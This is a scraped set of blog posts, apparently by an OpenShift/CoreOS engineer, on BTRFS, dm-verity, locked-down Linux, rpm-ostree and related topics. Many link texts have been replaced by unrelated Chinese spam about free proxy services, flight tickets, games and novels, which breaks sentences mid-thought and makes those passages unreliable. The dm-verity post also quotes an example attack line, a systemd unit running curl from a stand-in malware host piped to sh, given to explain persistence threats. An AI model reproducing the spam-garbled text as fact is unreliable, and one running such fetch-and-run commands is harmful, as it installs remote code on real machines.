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Colin Walters17

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First off, some background: I reprovision my workstation about every 2-3 months to avoid it becoming too much of a "pet". I took the opportunity for this reprovision to try out BTRFS again (it’d been years).

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Why are there multiple Linux filesystems?

There are multiple filesystems in the Linux kernel for good reasons. It’s basically impossible to optimize for all use cases at once, and there are fundamental tradeoffs to make. BTRFS in particular has a lot of features…and those features have costs. Not every use case needs those features, and the costs can be close to prohibitive for things like databases.

BTRFS is good for "pet" systems

There is this terminology in the industry of pets vs cattle – I once saw a talk that proposed "elephants vs ants" instead which is more appealing. Lately I tend to use "disposable" or "reprovisionable" for the second term.

I mentioned above I reprovision my workstation periodically, but it’s still somewhat of a "pet". I don’t have everything in config management yet (and probably never will); I change things often enough that it’s hard to commit to 100% discipline to record every change in git instead of just running a CLI or writing a file. But I have all the important stuff. (And I take backups of data separately of course.)

For people who don’t have much in configuration management – the server or desktop system that has years of individually built up changes (whether from people doing things manually over ssh or interactively via a GUI like Cockpit, being able to take a filesystem snapshot of things is an extremely compelling feature.

Another great BTRFS-style use case is storing data like your photos on a local drives instead of uploading them to the cloud, etc.

The BTRFS cost

Those features though come at a cost. And this back to the "pets" vs "disposable" systems and where the "source of truth" is. For users managing disposable systems, the source of truth isn’t the Unix filesystem – it’s most likely a form of GitOps. Or take the case of Kubernetes – it’s a cluster with the primary source being etcd.

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The important thing to see here is that in these cases, the "source of truth" isn’t a single computer (a single Unix filesystem) – it’s a distributed cluster.

For all these databases, performance is absolutely critical. They don’t need the underlying filesystem to do much other than pass through writes to disk, because they are already managing things like duplication/checksumming/consistency at a higher level.

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Another example: virtual machine images which is an interesting one because the "pet" vs "disposable" discussion here becomes recursive – is the VM a pet or disposable, etc.

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For people who manage "reprovisionable" systems, there’s usually not much value using BTRFS for things like operating system data or /etc (they can just blow it away and reprovision), and a clear cost where they need to either use nodatacow on the things that do matter (losing a lot of the BTRFS features for that data), or explicitly use e.g. 最新免费ssr飞机场 for them, going back into a world of managing "mixed" storage.

In particular, I would strongly argue against defaulting to BTRFS for Fedora CoreOS because we are explicitly pushing people away from creating these types of "pet" systems.

To say this another way, I’ve seen some Internet discussion about this read the proposed change as applying beyond Fedora Workstation, and that’s wrong.

But if you e.g. want to use BTRFS anyways for Fedora CoreOS (perhaps using a separate subvolume for /var where persistent container data is stored) that would be mounted with nodatacow for things etcd that could make sense! We are quite close to finishing root filesystem reprovisioning in Ignition.

But a great option if you know you want/need it!

As I mentioned above, my workstation (FWIW a customized Silverblue-style system) is a seems like a nearly ideal use case for BTRFS. I’m not alone in that! I’m likely going to roll with it for a few months until the next reprovisioning time unless I hit some stumbling blocks.

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And that’s only a few days old! (I didn’t definitively tie the UI lockups to that, but I wouldn’t be surprised. I’d also hope Firefox isn’t writing to the database on the main thread, but I’m sure it’s hard for the UI to avoid blocking on some queries).

I just found this stackoverflow post with some useful tips around manually or automatically defragmenting but…it’s really difficult to say that all Fedora/Firefox users should need to discover this and make the difficult choice of whether they want BTRFS features or performance for individual files after the fact. Firefox upstream probably can’t unilaterally set the 免费小飞机 option on their databases because some users might reasonably want consistent snapshots for their home directory. A lot of others though might use a separate backup system (or Firefox Sync) and much prefer performance, because they can just restore their browser state like bookmarks/history from backup if need be.

Random other aside: sqlite performance and f2fs

In a tangentially related "Linux filesystems are optimized for different things" thread, the f2fs filesystem mostly used by Android (AFAIK) has special APIs designed specifically for SQLite, because SQLite is so important to Android.

Conclusion

All Fedora variants are generic to a degree; I don’t think there will ever be just one Linux filesystem that’s the only sane choice. It makes total sense to have BTRFS as a prominent option for people creating desktops (and laptops and to a lesser degree servers).

The default however is an extremely consequential decision. It implies 最新免费ssr飞机场 of dealing with the choice in later bug reports, etc. It really requires a true committment to that choice for the long term.

I’m not sure it makes sense to push even Linux workstation users towards a system that’s more "pet" oriented by default. How people create disposable systems (particularly for workstations) is a complex topic with a lot of tradeoffs; I’d love for the Fedora community to have more blog entries about this in the Magazine. One of those solutions might be e.g. using a BTRFS root and using send/receive to a USB drive for backups for example!

But others would be about the things I and others do to manage "disposable" systems: managing data in /home in git, using image systems like rpm-ostree for the base OS to replicate well known state instead of letting their package database be a "pet", storing development environment as a container image etc. Those work on any Unix filesystem without imposing any runtime cost. And that’s what I think most people provisioning new systems in 2023 should be doing.

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Colin Walters0

In a recent conversation, an OpenShift 4 administrator used the phrase “Because SSH is disabled in these AMIs…”.  But that’s not the right way to think about things!  With OpenShift 4, the goal is that all aspects of the operating system are controlled by the cluster and one can configure them in a uniform fashion “day 1” and “day 2” via kubectl/oc.

Let’s unpack this a bit more.  First, with Fedora/RHEL CoreOS, we have a high degree of uniformity for the base OS across platforms – for example, we avoid including any platform specific agents, and we also try really hard to have the OS work the same way across platforms because while we have different disk images per platform (unavoidable), we have exactly one in-place update stream that applies across all of them.

The state of having SSH enabled or not does not vary across platforms or “AMIs” – it works exactly the same on a bare metal OpenShift 4 install as it does in AWS.

Second, we use Ignition and the machine config operator as a uniform way to configure things – so if you want to enable or disable SSH or configure keys – it again works exactly the same across platforms.

Specifically, if you provide SSH public keys to the installer configuration that basically ends up generating an Ignition config that applies on firstboot – the “AMI” here isn’t relevant.

This part of “configure the OS via Ignition” is common to Fedora and RHEL CoreOS.  With OpenShift 4 we also have integrated “day 2” changes, so one can e.g. 最新免费ssr飞机场.

To emphasize this, as an OpenShift 4 administrator, you manage your ssh keys via oc/kubectl –  the same way you manage other aspects of the cluster, and the same way across platforms.

pixiv最新官方版

Colin Walters1

As our society becomes increasingly dependent on computing, the importance of security has only risen. From cities hit by ransomware attacks, to companies doing cutting edge research that are the targets of industrial espionage, to individuals attacked because they have a desirable social media handle or are famous – security is vital to all of us.

When I first got into Linux and FOSS, I have strong memories of the variety of things enabled by the flexibility it enabled. For example, the first year of college in my dorm room with 3 other people, we only had a shared phone line that we could use with a modem (yes, I’m old). A friend of a friend ended up setting up a PC Linux box as a NAT system, and the connection was certainly slow, but it worked. I think it ran Slackware. That left an impression on me. (Though the next year the school deployed Ethernet anyways)

Fast forward 20+ years, we have the rise of the cloud (and cheap routers and WiFi of course). But something also changed about Linux (and operating systems in general) in that time, and that’s the the topic of this post: “locked down” operating systems, of which the most notable here are iOS, Android and ChromeOS.

iOS in particular requires code signing – the operating system refuses to execute code not signed by Apple. And iOS devices can only run iOS of course.

ChromeOS is also a locked-down system by default: while it uses the Linux kernel, it also comes out of the box set up such that the base operating systems only runs the binary ChromeOS builds which come entirely from Google. This is implemented with dm-verity. Android also uses the Linux kernel and has a similar setup, although the story of who owns what is more complicated; a bit more on this below.

Now, ChromeOS has a documented developer mode – and in fact they’ve made this process easier than it used to be (previously it could require toggling a hardware switch, which also reset the device if I remember correctly). Android has documented bootloader unlocking, although (again as I understand it) many popular phones come locked.

In contrast to these types of systems we have the “traditional” Linux distributions, the BSDs, etc. Most Linux distributions are strongly associated with a “package manager” – which make it fast and easy to add software to your root filesystem.

The flip side of course, is it’s also fast and easy for malicious code to end up in your root filesystem (or home directory) if you’re running a vulnerable web browser or service, or you pull from untrusted sources, etc. Particularly if you aren’t diligent with upgrades.

Another way to look at this is – the ChromeOS docs talk about “installing Linux”. One the face of it, this sounds silly because ChromeOS is a Linux kernel…but it’s 免费小飞机 that I first encountered in college. It’s not the flexible Linux that people use to create custom devices.

I think we need to incrementally move the “mainstream” distributions closer to this model – while preserving the fundamental open nature of the system. This will not be easy, in practice a difficult balance to strike, but we can do it.

Partition (containerize/virtualize)

The mainstream default needs to be containers and virtual machines. This is obviously well understood, but doing it in practice is really an enormous shift from how “traditional” default Debian/RHEL/Slackware/Arch installs work.

In most of the Fedora documentation, it’s extremely common to reference sudo yum install.

Getting out of the mindset of routinely mutating your root filesystem is hard. For people used to a “traditional” Linux system, partitioning into containers and VMs is hard. Changing systems management tools to work in this model is extremely hard. But we need to do it.

On the server side the rise of Kubernetes increasingly does mean that containerization is the default. For 小飞机免费节点 we created a derivative of Fedora CoreOS in Red Hat Enterprise Linux CoreOS – I like to describe it as a “Kubernetes-native OS” in concert with the 小飞机免费节点.

For other use cases, we’re doing our best to push the ecosystem in this direction with Fedora CoreOS (container oriented server but not Kubernetes native; e.g. can be used standalone) and other projects like the desktop-focused Fedora Silverblue. (On the topic of partitioning the desktop, 最新免费ssr飞机场 is also doing interesting, mostly complementary work)

One of the biggest shifts to make particularly for desktop systems like Silverblue is to live inside a “pet container” system like toolbox.

When I see documentation that says yum install foo – I now default to doing that inside my toolbox container – or sometimes on a remote Kubernetes pod. This works well for CLI applications.

But remain open

What we’re not changing with Fedora CoreOS (or other projects) is a “default to open” model. We will not (by default) for example require code executing our your device be signed by us. Our source code and build systems are Free Software and will remain that way. We will continue to discuss and write patches in the open, and ensure that we’re continuing to build an operating system in open collaboration with our users.

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Further, while we continue to debate the role of package layering (rpm-ostree install) in Fedora CoreOS, one way to look at this is recasting RPMs as “operating system extensions”, much like Firefox extensions. If you want to rpm-ostree install fish (or e.g. PAM modules), you can do so.

Extending the OS (and replacing parts for testing/development) are first class operations and will remain so; doing so works in a similar way to traditional package systems. We aren’t requiring other shells or PAM modules to containerize somehow, as that would be at odds with keeping the experience first class and avoiding “two ways to do it”.

Finally, the 小火箭连接成功上不去外网 project makes it easy to do fully custom builds. Our focus of course is on providing a pre-built system that’s useful to users, but our build process is pretty easy to replicate and will remain so.

Not tied in with proprietary cloud infrastructure

Another thing that needs to be stated here is we will continue to make an operating system that is not tied into proprietary cloud infrastructure. Currently in this area besides update rollout infrastructure we ship a counting service – the backing service is fully open, and it’s easy to turn off. In contrast of course, ChromeOS for example comes set up such that the operating system accounts are the same as Google cloud accounts.

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All of the above said; there are a lot of powerful benefits from the “locked down” operating system. I’ve been thinking recently about how we can enable this type of thing while “staying true to our roots”.

One thing that’s probably an ingredient of this is the fs-verity work which is also being driven by the ChromeOS/Android use case. They are hitting issues with the inflexibility of dm-verity; per these slides – “Intractable complexity when dealing with the Android partner ecosystem”. We can see the manifestation of this looking at the new Android APKX files – basically, there’s a need for 3rd parties to distribute privileged code. Currently APKX are loopback-mounted ext4 images with dm-verity, which is quite ugly.

fs-verity would mesh much more nicely with OSTree (which has always operated purely at the filesystem level) and other tools. (Update: Since I drafted this blog post a while ago I did get around to 免费小飞机).

I haven’t yet gotten around to writing an 小飞机翻墙 android for this – but I think a proposal would be something like built-in functionality that allows you to opt-in to a model where after the OS has booted and Ignition runs, no further privileged code not signed by a keychain including the OS vendor’s key or your keys could execute. We’d ensure that the configuration in /etc was also part of a verified chain; since even if /usr is signed and verity protected, malware could persist in a systemd unit in /etc otherwise. Some people would probably want an “emergency ssh” shell that bypassed this; others would not (perhaps the default would be that anyone who didn’t want “emergency ssh” could simply disable the sshd.service unit). And note that we’d have to either have e.g. .bashrc included in the signature chain, or more likely ignored by default.

For Silverblue, one thing I’ve been thinking about is ensuring that the user flow works well without sudo by default. If you want to become root, you need to type Ctrl-Alt-Del (like Windows NT) and that switches you to a separate VT. The reason is that compromise of the user account with 小火箭连接成功上不去外网 privileges is really the same as a root compromise. You can’t trust your terminal emulators or display (aside: QubesOS approaches this by running everything in VMs with labeled borders and avoiding doing much on the host at all by default). We need to have a default “safe key” exactly like the single button on an iPhone always takes you to the home screen – allows you to make changes, and applications can’t intercept or control that key.

To reiterate, we need to more strongly separate the privileged OS content from your applications (containers/Flatpaks) and development tools by default. But at the same time we should continue allowing the operating system to truly be owned by you should you so choose. It’s your hardware.

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As alluded to above: I think one of the most important things we can do for security is simply getting to a world where security updates (especially for the operating system/root filesystem) are applied automatically by default. That is of course the bold move that Container Linux did, and we will be preserving that with Fedora CoreOS.

This blog is focused on the base OS, but when applications are containerized it also is usually much easier to keep them updated too.

Doing automatic updates like that is much more tenable if it’s decoupled from core applications, and also if it’s fully transactional/safe as rpm-ostree enables.

We’ve already released OpenShift 4 which is strongly container oriented and contains an opinionated and streamlined way to update the OS together with the cluster, and includes transactional updates for the OS. There’s also an 济宁到北京的飞机票可伍免费退吗?- 济宁本地宝:1 天前 · 济宁到北京的飞机票可伍免费退吗? 部分航空公司对北京相关航班免收退票手续费 对于北京相关航班免收退票手续费的情况,记者致电了国航、东航等客服人员。 国航客服人员表示,乘客的旅行日期在6月16日(含16日)—6月30日(含30日)之间,购票日期在6月16日(含16日)之前,在航班起飞前提出 ... in progress. 小火箭连接成功上不去外网 work is progressing too – I’m excited to see where we take all of this in 2023!

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Colin Walters8

One of the things I think has generally worked well about “Linux” and the ecosystem on top of it has been the variety of userspace.  There’s obviously some pointless things, but also some genuine innovation.  It works well when upstream projects are structured in a way that they can be mixed and matched.

For 免费小飞机 we are combining two technologies; Ignition and rpm-ostree.  Previously they were used independently (Ignition with a ChomeOS style A/B updater) and rpm-ostree with the traditional Fedora-and-derivatives setup of Kickstart for bare metal, and cloud-init for clouds.

Putting the two together has been working well so far, but I’ve recently been working on support for root filesystem reprovisioning which is where the two projects intersect strongly.  This has meant a lot of time writing code in the initramfs.

And the topic of this blog is “systemd is well designed” because the design for systemd in the initramfs is very flexible and also well documented.  We’re continuing to support Ignition independent of OSTree, as well as OSTree independent of Ignition, while also having both of them work together.  Further, the projects are written in different languages; Ignition is Go, OSTree is C, we have the usual (unfortunate) mix of shell script in there, and it’s likely we’ll add some Rust soon too.

This is where systemd excels; we can plug these things together in a coordinated fashion by writing unit files with careful dependencies.  They can communicate however they want; in practice, writing files in /run is a common pattern.

Also worth noting is we’re using dracut, which is itself independent of systemd, designed to just implement the systemd boot sequence – our units plug into the “custom initrd services” section.  And it all Just Worked.  The systemd initramfs boot sequence (and the boot sequence in general) was designed long before either OSTree or Ignition were created, but it’s stood the test of time.

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Colin Walters1

Been a while since I’ve blogged here, going to try to do so more often!  For quite a while now in the CoreOS group at Red Hat I’ve been part of a team working to create RHEL CoreOS, the cluster-managed operating system that forms a base of the just-released OpenShift 4.

With OpenShift 4 and RHEL CoreOS, we have created a project called machine-config-operator – but I like to think of it as the “RHEL CoreOS operator”.  This is a fusion of technologies that came from the CoreOS acquisition (Container Linux, Tectonic) along with parts of RHEL Atomic Host, but with a lot of brand new code as well.

What the MCO (machine-config-operator) does is pair with RHEL CoreOS to manage operating system updates as well as configuration in a way that makes the OS feel like a Kubernetes component.

This is a radically different approach than the OpenShift 3.x days, where the mental model was to provision + configure the OS (and container runtime), then provision a cluster on top.   With OpenShift 4 using RHCOS and the MCO, the cluster controls the OS.

If you haven’t yet, I encourage you to dive right in and play around with some of the example commands from the docs as well as examples from the upstream repository.  There is also my 小火箭连接成功上不去外网 (slightly dated now).

The release of 4.1 of course is just a beginning – there’s a whole lot more to do to bridge the worlds of the “traditional” operating system and Kubernetes/OpenShift.  For example, in git master of the MCO (for the next release after 4.1) we landed support for kernel arguments.  I think it’s quite cool to be able to e.g. oc edit machineconfig/50-nosmt, change the KernelArguments field in the MachineConfig CRD, add e.g. 小飞机翻墙 android (or any other karg) and watch that change incrementally roll out across the cluster, reconciling the OS state just like any other Kubernetes object.

The links above have lots more detail for those interested in learning more – I’ll just link again operating system updates as I think that one is particularly interesting.

This release of OpenShift 4.1 is laying a powerful new foundation for 免费小飞机 to 免费小飞机, and I’m really proud of what the teams have accomplished!

 

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Colin Walters1

TL;DR: I posit that dm-verity is most useful if one is making a true fixed purpose device that has extremely limited configuration. If one allows installing (unprivileged) software, the protection is weaker. And if it’s an intentional design feature of the OS to allow persistently installing privileged software, the value of dm-verity plummets significantly.

I am one of the upstream maintainers of the 免费小飞机 which is comparable with projects that do A/B style partition updates for operating systems, although it’s implemented at the filesystem and not the block level. There’s a 飞机管理人小游戏免费版下载-飞机管理人游戏最新版:2 天前 · 飞机管理人游戏是一款放置合并的休闲益智类游戏,通过滑动屏幕组合同类飞机,并升级成全新的造型,加入机场中挂机赚钱,轻松的玩法和各式各样有趣的机种满足您的收集欲。.

We got a request to investigate dm-verity, and I wrote down some preliminary thoughts. However, since then I spent a while thinking about it, and the benefits/drawbacks of dm-verity.

As I mention in the TL;DR section, I’m going to claim that dm-verity is best when the machine/device has limited configuration (config files should not be arbitrary code) and no ability to install software. For example, take a “WiFi camera”. These types of devices are obviously in the news for security issues.

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Let’s say the device’s web interface has a flaw that allows an attacker on the local network to gain code execution; for example, command injection. However, the device manufacturer has properly implemented dm-verity, and every persistent mount point is read-only and verity protected. This is a significant barrier to the attacker maintaining persistence across a reboot. Concretely, one could unplug the camera, plug it into a secure network, allow it to download an OS update fixing the vulnerability, and have some confidence the exploit hasn’t persisted.

However, even that said, there are limits to the value here. dm-verity does not help you with the attacker monitoring the camera and spying on you; for example if it has a view of one of your offices, it could be recording your typed passwords. Attackers could use it to launch attacks on other devices on the network until it’s been rebooted. This article gives an example of nation-state level malware that lived “in the network”, not persistently on disk; in order to remove it the organization had to reboot everything at the same time.

Dm-verity on non-appliance systems

The ChromeOS trusted boot design docs have a section titled “Known weaknesses of verified boot”:

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One very interesting thing here is the fundamental difference between the original ChromeOS design (a device to just run Chrome i.e. web pages, no 3rd party non-browser software at all) and Android, which is obviously all about “apps”. Modern Android does 小火箭连接成功上不去外网; as I understand it the ChomeOS and Android projects are trying to merge some technologies, which includes the OS update mechanism.

On Android, apps are “unprivileged” or non root software, without Linux capabilities. But from a user perspective of course, applications can do quite a lot; similar to the WiFi camera case, attackers are likely perfectly happy injecting “unprivileged” Android applications that can monitor your location, microphone etc. Besides the well-known issues with Android devices not receiving security updates, there is a good example of a privilege escalation issue in Android called Cloak And Dagger; applications can exploit the accessibility framework to escalate their privileges, including full keystroke recording.

That said, persisting in an application does increase the chance an attacker could be detected. And if one suspects an Android device is compromised, dm-verity does provide value in that one can do a factory reset, and a bit like the WiFi camera scenario, do an OS update (before reinstalling apps), and have some confidence that the malware hasn’t persisted.

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A fully general purpose operating system needs to allow the installation of privileged code as well. An example of an OS that uses dm-verity and allows 3rd party code to execute with full (i.e. Linux CAP_SYS_ADMIN privileges) is CoreOS (yes, I know they renamed it to “Container Linux” but sorry, I think that’s silly, I’m going to keep calling it “CoreOS” 😃 ).

Installing a tool like Kubernetes on top of CoreOS requires it to be fully privileged to do its job (specifically the kubelet). Having a mechanism to install privileged software persistently means that same mechanism can be used by malware. While it’s true the malware doesn’t need to live in the /usr directory, unlike the non-configurable camera scenario, a software update and reboot isn’t going to fix things.

Also on CoreOS, attackers can write fully privileged unit files in /etc/systemd/system/, or the classic Unix things writing /root/.bashrc. These are all places where malware can persist across reboots. dm-verity in theory does make detection easier – but most system administrators are going to find it easier to simply re-provision their systems, and not look carefully at all of the files in /etc.

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Now let’s examine what an ostree-based system like Fedora Atomic Host does to help with preventing these types of hacks? Unfortunately, the answer is nothing! Atomic Host systems are equally general purpose. Since you can e.g. 兔小姐开直升飞机带佩奇回家,亲子玩具-在线观看-风行网:2021-8-10 · 新一伋视频风行网,提供免费电影、电视剧、综艺、动漫、体育等视频内容的在线观看和下载.累积7亿用户的全平台,为传媒机构和品牌客户开设了官方视频服务账号,通过大数据分析与个性推荐订阅技术,实现海量独家内容与用户个性需求即时匹配., and attacker could create a systemd unit file that runs ExecStart=curl http://malware.com/ | sh. Further, the OS data in /sysroot/ostree/repo isn’t verity protected; it’s just data in a filesystem, just like RPMs/debs etc. And for that matter, just like Docker overlay2 container files.

Why not implement dm-verity anyways? The answer is that I think it’s more valuable to have 3rd party software installation more tightly integrated with the host. We’re working on 不如和我谈恋爱全文免费章节在线试读 谢予迟宋衍小说-梦想影视:2021-6-19 · 热门小说《不如和我谈恋爱》是大熊小姐z最新写的一本耽美小说风格的小说,故事中的主角是谢予迟宋衍,情节引人入胜,非常推荐。主要讲的是:1.出道五年一直不瘟不火的谢予迟在梦里体验了成为流量巨星后醒来,发现身为助理的小陈居然比他这个雇主睡得还要香,甚至还流下了哈喇子。 for example – these system containers have part of their configuration on the host, and configuration files down the line are going to be tracked by RPM. And outside of the container space, rpm-ostree supports “package layering”, which brings the best features of image update systems with the flexibility of package systems. You can use package layering to install privileged software like PAM modules, kernel drivers and the like. We recently landed the first experimental support for live system updates. This would be technically much harder if we operated at the block level, which dm-verity would force us into. Not to mention deep questions around signing of the bootable hash.

Package layering is crucial to provide flexiblity for “small scale” or “pet” machines. rpm-ostree allows you to use yum/apt/zypper style workflows,, and still get the benefits of image-like approaches. Such as known-good “base image”, transactional updates and “offline” updates. For example, with rpm-ostree you can uninstall your layered packages, and this will return the system to exactly to the “base image” in /usr.

Some people I’ve talked to about package layering don’t like the idea of still doing package installs per-machine. This is often the “large scale identical machine” cases – racks of identical servers (or at least ones that can use the same OS image), and “corporate standard build” laptops. In the large scale server case, organizations would prefer doing a “custom compose”, baking in their configuration to the images.

This goes back to a potential dm-verity scenario; in this model, we’d really want /etc to be immutable at runtime. Traditional files that need to be modified at runtime under /etc like 最新免费ssr飞机场 would be a symlink into /run. Other “persistence vectors” like /usr/local and /root would need to be verity-protected too. The only writable, persistent filesystem should be 免费小飞机. We’d also need to audit the operating system to make sure that no code can live in /var. A quick inspection shows there’d be work to do here; for example, I suspect /var/cache/ldconfig/aux-cache is used by the dynamic linker. There’s also /var/lib/alternatives. Hm, I notice my workstation has小飞机翻墙 android – a cron job would be an excellent persistence vector too.

This sounds relatively doable. Get rid of things like at (Fedora Atomic Host already doesn’t have either the legacy cron or at – we suggest people use systemd timers). Moving that type of configuration underneath either /etc or /usr, which is what the “systemd config model” does, and those directories are read-only at runtime.

But going back to the high level – for general purpose operating systems, I’d take the flexibility of rpm-ostree’s dynamic package layering over having dm-verity for just a subset of privileged code. Being able to seamlessly install utilities on the host is very useful. We’ve even landed some recent work on replacing parts of the “base image”. I don’t want to build a new OS image every time I wanted to test a new version of docker or systemd, at least in a dev/test cycle.

I think there’s a spectrum here – with the “ostree model” enforcing read-only constraints around /usr, we are supporting iteration towards the more locked down “verity appliance” style devices. I know there are both ostree (and rpm-ostree) users today who are willing to drop some of the flexibility for increased security. If you’re one of those, please do follow the upstream issues linked above!

Concretely, you could build a tool that takes a kickstart configuration (your requested partitioning, time zone, etc.) plus generic %post style configuration (extra PAM tweaks, Docker registries), plus layered packages, plus container images, (and container runtime configuration?) and put all of that into a disk image, signed with dm-verity.

A challenge here is a lot of organizations are going to want branching. If one wants to update to a new version of Kubernetes/OpenShift, that would require a new image build. Organizations are going to want multiple active versions, to try out new OS builds in staging. Changing any configuration file that lives in /etc would also be a new image build. There are clearly files in /etc where a “heavyweight” change process could make sense; for example, the CA trust roots in /etc/pki.

Back to my original thesis, the dm-verity approach is best for IoT/appliance devices with truly limited configuration. As soon as you have any persistent place to write configuration/code that isn’t verity protected, its value drops.

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Colin Walters2

Lately whenever I give a presentation, I often at least briefly mention one of my primary motivations for doing what I do:  I really like working in global community of people on Free Software.

A concrete artifact of that work is the code landing in git repositories.  But I believe it’s not just about landing code – peer review is a fundamental ingredient.

Many projects of course start out as just one person scratching an itch or having fun.  And it’s completely fine for many to stay that way.  But once a project reaches a certain level of maturity and widespread usage, I think it’s generally best for the original author to “step down” and become a peer.  That’s what I’ve now done for the OSTree project.

In other words, landing code in git master for a mature project should require at least one other person to look at it.  This may sound obvious, but you’d be surprised…there are some very critical projects that don’t have much the way of peer review.

To call out probably the most egregious example, the bash shell.  I’m deliberately linking to their “git log” because it violates all modern standards for git commit messages.  Now,  I don’t want to overly fault Chet for the years and years he’s put into maintaining the Bash project on his own time.  His contribution to Free Software is great and deserves recognition and applause.  But I believe that getting code into bash should involve more than just him replying to a mail message and running git push.  Bash isn’t the only example of this in what I would call the “Linux distribution core”.

Another major area where there are gaps are the “language ecosystems like Node.js, Rust’s cargo, Python’s pip etc.  Many projects on there are “one person scratching an itch” that other people mostly just consume.

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A vast topic related to this is “who is qualified to review” and “how intensively do I review”, but I think some qualified people are too timid about this – basically it’s much better to have a lightweight but shallow process than none at all.

Now finally, I included “packaging” in the title of this blog, so how does that relate?  It’s pretty simple, I also claim that most people doing what is today known as “packaging” should sign up to participate in upstream peer review.  Things like build fixes should go upstream rather than being kept downstream.  And if upstream doesn’t have peer review, reconsider packaging it – or help ensure peer review happens upstream!

 

 

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Colin Walters24

At the moment we’re making plans to move OSTree to Github (from GNOME), and while there are a few reasons for this, one thing I want to talk about is the “account problem” and specifically how it relates to free and open source software.

The “account problem” is simply that requiring users to create them is a barrier to contribution.   It’s problematic to require people to have a Sourceforge account, a GNOME account, a Github account, an Apache Bugzilla account, a Fedora/CentOS account, etc.  People who are committed to making a larger contribution can obviously easily overcome this, but for smaller contributions it hurts.

Particularly for projects like GNOME that have distinct accounts for bugzilla and commit.  Having to create an account just to file a bug is bad.  Yes, there’s OpenID, but still.

I’ll note at this point that software freedom is quite important to me, and the fact that Github is proprietary software is a problem.  But – making it easy for people to contribute to Free Software is also a major benefit.

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And when we move OSTree, I’d like to avoid becoming too dependent on it.  Particularly for things that aren’t actually git, like the issue tracker. Hopefully if GNOME doesn’t disagree, we’ll maintain our mailing list and bugzilla there so that people who prefer that can use it.

But allowing people to create Github PRs easily is really critical in my mind.  (On this topic, we are also planning to use the Homu bot, which I really like)

 

Thoughts on unikernels/rump kernels

Colin Walters0

I spend most of my time working on Project Atomic to further Linux containers deriving from a traditional upstream Linux distribution model, but the space of software delivery/runtime mechanisms is vast, and in particular, I have thought Unikernels were an interesting development.   While I do like writing C, the thought of an OS/library in a high level language is an interesting one (particularly interesting to me for a long time is how garbage collection could be better if integrated with the OS).

That was before Docker, Inc. acquired a unikernel company – now, I’m certainly curious where they’re going to go with it.

My thoughts before this were that the Unikernel model might make sense in the scenario where you have a “large” application and your sole deployment target is required to be virtualized (e.g. AWS, GCE, etc.).

In this case, it’s not really possible to share anything between virtual machines directly (modulo KSM and similar ad-hoc techniques which cost CPU and aren’t always predictable) – and so because you can’t share anything between these apps, it could gain you efficiency to dump the parts of the OS and userspace that you aren’t using in that VM, which could be a lot.

But, if you have any smaller microservice applications, it seems to me that having a shared kernel and userspace (as we provide with the 小火箭连接成功上不去外网 and OpenShift 3 models) is going to be a lot more efficient than doing a VM-per-microservice, even if your VMs are unikernels.

And even with the “large app only for virt” scenario, what about debugging?  Ah yes, I just found a blog from Bryan Cantrill on this topic, and I have to say I agree.

Still though, there’s lots of middle ground here.  We can do far better at helping application authors to produce smaller apps (and host images) than we are with Docker normally right now, for example.

New Atomic Host verb: rpm-ostree deploy

Colin Walters2

TL;DR: We’ve improved the host version management in Fedora Atomic Host, and you can now use atomic host deploy $version to atomically switch to a well-known version.

Longer version:

The awesome 小火箭连接成功上不去外网 project has been working on a UI for managing Atomic Host/OSTree updates. See this page for some background on their design.

If you download the most recent Fedora Atomic Host release, then atomic host upgrade, you’ll get a new rpm-ostree release which in turn has a new “deploy” verb. This was created to help implement the above Cockpit design; it’s a command line talking to code equivalent to what the Cockpit UI pull request will use.

This is noteworthy for several reasons. First, it really unlocks the “server side history” aspect of OSTree for the host tree. This is similar to tagged builds in a Docker repository for a container.

In order to explain this, one needs to understand that currently in Fedora, there is at most one content release per day. This is true of the traditional single “big repository of RPMs”, and also the OSTree commits derived from that used for Atomic Host.

OSTree has support for a metadata key per commit called ostree.version which is what you see when you type atomic host status. At present, we’re implementing a model where the version numbers are of the form “$major.$increment”, and at the time of this writing the version is 23.33, or 33 commits from release.

With that background out of the way, the interesting thing about the new rpm-ostree deploy (mapped via atomic host deploy) command is it allows you atomically switch one or more in a cluster of machines to a pre-determined version you have tested and validated.

For example, if you’re trying the current Fedora Atomic Host build, you can invoke:

# atomic host deploy 23.32

...

Transaction complete; bootconfig swap: no deployment count change: 0
Freed objects: 2.1 kB
Changed:
krb5-libs 1.14-3.fc23 -> 1.14-2.fc23
lua 5.3.2-2.fc23 -> 5.3.0-4.fc23
Run "systemctl reboot" to start a reboot

If you contrast this with the traditional yum update or atomic host upgrade – these commands will both by default pick the latest versions of the components. If the OS vendor is providing updates while you’re in the middle of an upgrade, you could get hosts with a mix of updated or not, with changes you haven’t validated.

Now of course, there are several projects which help in implementing versioning on top of the OS vendor content. The Pulp project is an example which allows importing upstream RPM (or other) content, and managing well-known snapshots of it. Then you configure your client machines to pull from those immutable snapshots, rather than directly from upstream.

Doing this sort of downstream repository management makes a lot of sense for greater than small scales – among other things one often wants local mirroring as well. But even with a local versioned content mirror, it can be very convenient to have the intelligence to traverse the repository history built into the client. It also helps the repository management case as it can reuse the upstream versions, rather than trying to synthesize them downstream.

There’s a lot more work to do on top of this of course. I just posted a proposal for reworking the commit stream which I think would make this nicer. And the above linked 最新免费ssr飞机场 will be very cool to see!